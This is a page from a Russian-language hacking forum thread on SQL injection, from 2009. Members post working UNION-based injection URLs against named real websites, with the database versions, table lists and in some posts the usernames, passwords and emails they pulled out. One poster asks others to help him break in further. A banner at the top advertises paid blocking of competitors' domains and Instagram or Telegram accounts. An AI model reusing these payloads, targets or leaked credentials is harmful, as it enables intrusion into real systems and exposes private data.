УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 940 из 1242

940

Опции темы

Поиск в этой теме

Опции просмотра

#9391

17.05.2009, 13:11

erihtoney

Познающий

Регистрация: 03.03.2009

Сообщений: 86

Провел на форуме:
994199

Репутация: 258

Отправить сообщение для erihtoney с помощью ICQ

All India Oracle Users Group
Google PageRank : 4

Цитата:

http://www.aioug.org
/eventdetails.php?id=-5+union+select+1,2,3,concat_ws(0x20,version(),user (),
database()),5,6,7,8,9,10,11,12

version 5.0.67-msl-icd1-log
user aioug@localhost
database aioug_dbt

columns from users

Цитата:

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,
5,6,7,8,9,10,11,12+from+information_schema.columns +where+table_name=char(117,115,101,114,115)+limit+ 2,1

Цитата:

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2+from+information_schema.columns+where+table_name =
char(117,115,101,114,115)+limit+3,1

(email,pass)

Цитата:

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,
concat_ws(0x20,id,email,pass,website),5,6,7,8,9,10 ,11,12+from+users+limit+1,1

#9392

17.05.2009, 13:50

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://4e.plantphys.net/printer.php?ch=5&id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10

plantphy@localhostlantphys_4e:4.0.14-standard-log

#9393

17.05.2009, 15:28

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

ПР5
http://sozmod.eawag.ch/cv.php?id=1+union+select+unhex(hex(TABLE_NAME))+fr om+information_schema.tables+/*+

ПР5
http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter

#9394

17.05.2009, 15:28

RU.coder

Новичок

Регистрация: 03.05.2009

Сообщений: 2

Провел на форуме:
47299

Репутация: 7

http://uac.unborn.at/forumv2.php?cat=4'+and+0+union+select+1,2,concat_w s(0x20,id,nick,pw,nname,icq,mail),4,5,6+from+users +where+id=1/*

Последний раз редактировалось RU.coder; 17.05.2009 в 18:29..

#9395

17.05.2009, 15:36

Dagon

Познающий

Регистрация: 27.03.2006

Сообщений: 86

Провел на форуме:
972602

Репутация: 52

Астранань.ру

http://www.astrakhan.ru/humour/?cmd=read_full&id=%27+UNION+SELECT+1,2,3,4,passwor d,6,7,8+FROM+astrakhan.portal_users+where+login=%2 7tHunder%27/*

#9396

17.05.2009, 16:04

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_sche ma.tables+limit+197,1000--

tables:
jos_users
user
virtual_users
virtual_domains
view_users
users
series_users
series
seminarios
turba_shares_users
nag_shares_users
mnemo_shares_users
ingo_shares_users
horde_users
wp_users
usuarios
Таблицы все закрыты((

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+ from+mysql.user--

#9397

17.05.2009, 16:07

erihtoney

Познающий

Регистрация: 03.03.2009

Сообщений: 86

Провел на форуме:
994199

Репутация: 258

Цитата:

http://audiovisuals.audio.uv.es/tau/producciones.php?action=prod&id=-9999+union+select+1,2,concat_ws(0x20,version(),
user(),database()),4,5,6,7,8,9,10,11,12

version 4.0.17-nt
user root@localhost
database tau

#9398

17.05.2009, 16:12

udman

Постоянный

Регистрация: 21.04.2009

Сообщений: 321

Провел на форуме:
785842

Репутация: 239

Цитата:

http://www.romver.ru/services/services.php?razdel=-1117+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x 0b,user(),dat abase(),version()),11,12

caramel@10.210.10.10
caramel
5.0.75-log

В таблицах ниче интересного, админки нет

#9399

17.05.2009, 17:53

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

ПР5
http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10 ,11,12,13+from+members/*

davido1 leaden
Админку не нашёл(

#9400

17.05.2009, 17:54

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+23,1/*
через column_name узнал, что в этой таблице есть id,login,password
дальше копать не могу, не позволяют знания пока...

попробовал: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+ad min/*
не работает...

p.s. ТИЦ 40
Если кто докопает что-интересного, напишите в лс, хотя бы понять что не правильно делал.

Страница 940 из 1242

940

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)

Быстрый переход